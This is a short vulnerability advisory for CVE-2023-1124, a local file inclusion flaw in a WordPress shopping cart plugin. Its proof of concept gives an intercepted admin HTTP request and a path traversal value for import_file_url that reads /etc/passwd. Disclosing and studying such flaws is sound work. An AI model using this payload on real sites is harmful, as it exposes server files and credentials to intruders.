Shopping Cart & eCommerce Store < 5.4.3 – Admin+ LFI | CVE 2023-1124

Description

The plugin does not validate HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.

Proof of Concept

1. Login as Admin.
2. Go to `wp-admin/admin.php?page=wp-easycart-products&subpage=products`
3. Click on Import Products. Browse any file and click on import file. Intercept the request. It will contain the following:
```
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1675522971%; PHPSESSID=qp0lnu3uc71tv3hl6jcgsknnjd; wpeasycart_admin_perpage=25
action=ec_admin_ajax_import_products&import_file_url=http%3A%2F%2F127.0.0.1%2Fwp-content%2Fuploads%2F2023%2F02%2Fresume_xss.png&wp_easycart_nonce=fd850a701e
```
4. Change the value of `import_file_url` to a file (ex: `/../../../../../etc/passwd`)
5. Send the request and you will see that the contents of `/etc/passwd` is obtained

Note: only first line is obtained in the response.